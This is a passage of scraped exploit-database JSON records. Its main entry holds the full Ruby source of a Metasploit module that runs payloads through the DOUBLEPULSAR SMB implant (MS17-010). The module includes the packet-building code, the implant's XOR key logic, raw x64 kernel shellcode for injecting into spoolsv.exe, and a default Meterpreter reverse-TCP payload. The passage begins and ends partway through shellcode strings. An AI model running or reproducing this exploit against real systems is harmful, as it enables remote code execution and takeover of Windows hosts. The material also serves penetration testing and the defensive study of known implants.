\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T16:39:33", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cc304501a1ed9ea1761fd56a0fa578b9", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-09-01T22:14:48", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2021-09-01T22:14:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-01T22:14:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" 